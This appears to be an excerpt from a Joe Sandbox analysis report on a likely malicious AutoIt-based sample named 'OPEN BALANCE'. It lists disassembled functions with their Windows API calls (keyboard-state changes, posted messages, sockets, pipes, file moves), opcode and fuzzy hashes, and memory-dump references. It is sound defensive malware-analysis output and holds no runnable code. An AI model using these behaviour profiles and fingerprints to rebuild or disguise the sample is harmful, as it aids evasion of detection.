Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: e5d3d74a1cdf305a990ac5e38518c3b84fc40bf452da578e425d7b90da93bebc
Instruction ID: e4f46670e4eaf320013c8e74ad41ff444bfee9e8eae3e02fc591905c9d8777e5
Opcode Fuzzy Hash: e5d3d74a1cdf305a990ac5e38518c3b84fc40bf452da578e425d7b90da93bebc
Instruction Fuzzy Hash: 0B916B71A00219ABDF20CFA4C898FAEBBB8FF56714F10855DE505EB281D770D985CBA0

Function 008B1187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 008B125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 008B1284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 008B12A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 008B12D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 008B135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 008B13C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 008B1430

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 1dfae770607314ea3a34ef85ddd4544449ae9bef9cd24b5b4d4d9200116556e7
Instruction ID: a089362580eadb8647fbe118278448c9ec077322899c2d4ef0cd67e5c959a6d0
Opcode Fuzzy Hash: 1dfae770607314ea3a34ef85ddd4544449ae9bef9cd24b5b4d4d9200116556e7
Instruction Fuzzy Hash: E591BD71A00219AFDB10DFA8C8A8BFEB7B6FF45315F504029E900EB392D774A941CB95

Function 0085948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 5b6fd3bb2fd8799931083b839ba038aa215088b3aa05312973fe5e335e506fae
Instruction ID: e74b62b97f5b84d88ab0670a052b5cdb00f06747c6485c08c1b5d04a42ac9a4b
Opcode Fuzzy Hash: 5b6fd3bb2fd8799931083b839ba038aa215088b3aa05312973fe5e335e506fae
Instruction Fuzzy Hash: 41912471900219EFCB10CFA9C888AEEBBB8FF49321F148159E955F7251D378AA55CB60

Function 008C3947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 008C396B
CharUpperBuffW.USER32(?,?), ref: 008C3A7A
_wcslen.LIBCMT ref: 008C3A8A
VariantClear.OLEAUT32(?), ref: 008C3C1F

Part of subcall function 008B0CDF: VariantInit.OLEAUT32(00000000), ref: 008B0D1F
Part of subcall function 008B0CDF: VariantCopy.OLEAUT32(?,?), ref: 008B0D28
Part of subcall function 008B0CDF: VariantClear.OLEAUT32(?), ref: 008B0D34

Strings

AUTOIT.ERROR, xrefs: 008C3A80, 008C3A85
Incorrect Parameter format, xrefs: 008C39A6, 008C3BA1

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 13ba32932b4b52e1c5206943533bcb663e3e2c3706bf26ebe16f50e9ffe64e93
Instruction ID: 2fe58a3efaabb8521e0e1fc6c2cf5ff9a7b19aa96f80ebd4732fafd035d8b8f2
Opcode Fuzzy Hash: 13ba32932b4b52e1c5206943533bcb663e3e2c3706bf26ebe16f50e9ffe64e93
Instruction Fuzzy Hash: FB910175A083059FC714DF28C480A6AB7E5FB89314F14896DF88ADB351DB31EE46CB92

Function 008D20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 008D2183
GetMenuItemCount.USER32(00000000), ref: 008D21B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 008D21DD
_wcslen.LIBCMT ref: 008D2213
GetMenuItemID.USER32(?,?), ref: 008D224D
GetSubMenu.USER32(?,?), ref: 008D225B

Part of subcall function 008A3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 008A3A57
Part of subcall function 008A3A3D: GetCurrentThreadId.KERNEL32 ref: 008A3A5E
Part of subcall function 008A3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008A25B3), ref: 008A3A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 008D22E3

Part of subcall function 008AE97B: Sleep.KERNEL32 ref: 008AE9F3

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 3afa46192b29aff3eca699896d0b6b3a2c9ad34c3031a1cd7712689a92a8d95d
Instruction ID: d012b375fe6ce4d89162c2b3d544684e75a0074507e13238a4ea39742c50e843
Opcode Fuzzy Hash: 3afa46192b29aff3eca699896d0b6b3a2c9ad34c3031a1cd7712689a92a8d95d
Instruction Fuzzy Hash: E8718D35A00219AFCB10EF68C881AAEB7F5FF58310F14855AE916EB351DB35EE41CB91

Function 008C372C Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 187COMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 008C3774
VariantInit.OLEAUT32(?), ref: 008C38E4
VariantClear.OLEAUT32(?), ref: 008C3936

Strings

Invalid parameter, xrefs: 008C3865
NULL Pointer assignment, xrefs: 008C381E
Failed to create object, xrefs: 008C37E4, 008C389A

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Variant$ClearInitInitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 4200086340-1287834457
Opcode ID: 9b69223a7d15382ae6a241622ec27210667060bf0e4b02e5d64c1cffa90f1fc2
Instruction ID: 1aa0cb1fab19e59214e6c622c8ce2ef8e3f7fe6cdcfa4f42eddb52850b3c5c3c
Opcode Fuzzy Hash: 9b69223a7d15382ae6a241622ec27210667060bf0e4b02e5d64c1cffa90f1fc2
Instruction Fuzzy Hash: 41614770608211AFD210DF58C889F6ABBF4FF89715F10892DF985DB291D770EA49CB92

Function 008AAEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 008AAEF9
GetKeyboardState.USER32(?), ref: 008AAF0E
SetKeyboardState.USER32(?), ref: 008AAF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 008AAF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 008AAFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 008AAFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 008AB020

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 4a3aaecf20909f9007124b18338b33b61694ad6d61968f678ce9c38f4219058c
Instruction ID: 76ffa122c9a06a5de941d6e72dffd31729c52ad0f4cf102952c69078159fc62b
Opcode Fuzzy Hash: 4a3aaecf20909f9007124b18338b33b61694ad6d61968f678ce9c38f4219058c
Instruction Fuzzy Hash: E75182A06047D53DFB3A42348C45BBABEA9BB07304F08858AE1E5D5CC3D7D9A894D762

Function 008AACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 008AAD19
GetKeyboardState.USER32(?), ref: 008AAD2E
SetKeyboardState.USER32(?), ref: 008AAD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 008AADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 008AADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 008AAE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 008AAE38

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: ba4728ff2bc52baed6cb842a80505173f7c4ed717808ac8ccca1220d1452f6ce
Instruction ID: 9223ed3409b3a721180dddce82728bc4921237ad0c813653a988f84e5268702b
Opcode Fuzzy Hash: ba4728ff2bc52baed6cb842a80505173f7c4ed717808ac8ccca1220d1452f6ce
Instruction Fuzzy Hash: 2351B0A15047D53DFB3B82648C95B7ABFA8BB47300F088589E1D5D6CC2D394EC98E762

Function 0087542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00883CD6,?,?,?,?,?,?,?,?,00875BA3,?,?,00883CD6,?,?), ref: 00875470
__fassign.LIBCMT ref: 008754EB
__fassign.LIBCMT ref: 00875506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00883CD6,00000005,00000000,00000000), ref: 0087552C
WriteFile.KERNEL32(?,00883CD6,00000000,00875BA3,00000000,?,?,?,?,?,?,?,?,?,00875BA3,?), ref: 0087554B
WriteFile.KERNEL32(?,?,00000001,00875BA3,00000000,?,?,?,?,?,?,?,?,?,00875BA3,?), ref: 00875584

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 95bcd1de1422302afddd317758a54b7ededaf00302f3995bbf11b172269a58b4
Instruction ID: 28d266d3dc750fcdf05ec413bf24dd41cb48b7ff90118228d1ce997c0b9b8046
Opcode Fuzzy Hash: 95bcd1de1422302afddd317758a54b7ededaf00302f3995bbf11b172269a58b4
Instruction Fuzzy Hash: 6E51D3B0A006499FDB10CFA8D855AEEBBF9FF09300F14811AF959E7295E770DA41CB61

Function 00862D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00862D4B
___except_validate_context_record.LIBVCRUNTIME ref: 00862D53
_ValidateLocalCookies.LIBCMT ref: 00862DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 00862E0C
_ValidateLocalCookies.LIBCMT ref: 00862E61

Strings

csm, xrefs: 00862DF6

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: b29d6b973ffceafa579262f8fb1da91f0aec6993367a6f2afa493c12b2913961
Instruction ID: 2926d2ad6daa9ffa8eafb9060d27e2b7603e1c1e7ce3a647df6b8555117f8b8a
Opcode Fuzzy Hash: b29d6b973ffceafa579262f8fb1da91f0aec6993367a6f2afa493c12b2913961
Instruction Fuzzy Hash: 0C419334A0060DABCF10DF68C845A9EBBB5FF45364F1581A5E814EB392DB319A15CB91

Function 008C10B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 008C304E: inet_addr.WS2_32(?), ref: 008C307A
Part of subcall function 008C304E: _wcslen.LIBCMT ref: 008C309B

socket.WS2_32(00000002,00000001,00000006), ref: 008C1112
WSAGetLastError.WS2_32 ref: 008C1121
WSAGetLastError.WS2_32 ref: 008C11C9
closesocket.WS2_32(00000000), ref: 008C11F9

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: c048894774c013d63843dd3b37177a9b75e1ba0b118ed1254dfb849dd482c140
Instruction ID: f13befbcf39909d00cdf81b0e9c49d04701a44149de9e1d99eb80c340d5dc816
Opcode Fuzzy Hash: c048894774c013d63843dd3b37177a9b75e1ba0b118ed1254dfb849dd482c140
Instruction Fuzzy Hash: 5341B131600209AFDB109F18C888FA9B7B9FF46324F18815AF915DB292C778ED41CBA1

Function 008ACF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 008ADDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008ACF22,?), ref: 008ADDFD

Part of subcall function 008ADDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008ACF22,?), ref: 008ADE16

lstrcmpiW.KERNEL32(?,?), ref: 008ACF45
MoveFileW.KERNEL32(?,?), ref: 008ACF7F
_wcslen.LIBCMT ref: 008AD005
_wcslen.LIBCMT ref: 008AD01B
SHFileOperationW.SHELL32(?), ref: 008AD061

Strings

\*.*, xrefs: 008ACFF3

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 0d51d6247418d41c6edc8bf5d51aca4528baf4d6e546aceaaa51237903e918db
Instruction ID: 4812b7312edd9361d3883166ebfe33d400801b09a82a69dbb8cc011d98cfbd74
Opcode Fuzzy Hash: 0d51d6247418d41c6edc8bf5d51aca4528baf4d6e546aceaaa51237903e918db
Instruction Fuzzy Hash: 504153719452199FEF12EBA4C981ADEB7B9FF09380F0000E6E505EB541EF74AA44CB51

Function 008D2DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 008D2E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 008D2E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 008D2E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 008D2EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 008D2EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 008D2EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 008D2F0B

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: a1e703f164ce31dd99ede6f7f5c659fcaf4e19805fd4a57197006333cc9ab29c
Instruction ID: 03b0f2e405cb35126fdf06b2231f6f85ed37d8b20c6b3b274a59411bfc894d8f
Opcode Fuzzy Hash: a1e703f164ce31dd99ede6f7f5c659fcaf4e19805fd4a57197006333cc9ab29c
Instruction Fuzzy Hash: FE310330645255AFDB21CF58EC84FA537E1FBAA711F1542A6FA11CB2B2CB71E840EB41

Function 008B04D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 008B04F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008B052E

Strings

nul, xrefs: 008B0567

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 8abd24ba794e2141896977b1e121c1f337cf0f7a6c1b5b63747ff2a4a13c5d94
Instruction ID: c739c948d7f6ddc0ef696c08b9bf6ae2adeabad1ab3ed4ad3ff2cb4a2349f701
Opcode Fuzzy Hash: 8abd24ba794e2141896977b1e121c1f337cf0f7a6c1b5b63747ff2a4a13c5d94
Instruction Fuzzy Hash: 69210CB550030AAFDB309F69DC45A9B7BA4FF45764F204A19E8A1E63E0D7709950CF20

Function 008B05A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 008B05C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008B0601

Strings

nul, xrefs: 008B0639

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 8ac18b3f8c1e0ad2860d13534dd239ee0f66e0ed6812af7cc0b5087a5a56c456
Instruction ID: e1952f39ed839c965c03ca40f32a146d60d69d800f74c9e0eb0ab888c5188eab
Opcode Fuzzy Hash: 8ac18b3f8c1e0ad2860d13534dd239ee0f66e0ed6812af7cc0b5087a5a56c456
Instruction Fuzzy Hash: EC212F755003169BDB209F699C44ADB7BE8FFA6725F200B19E8A1E73E0D7709960CF50

Function 008D40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0084600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0084604C
Part of subcall function 0084600E: GetStockObject.GDI32(00000011), ref: 00846060
Part of subcall function 0084600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0084606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 008D4112
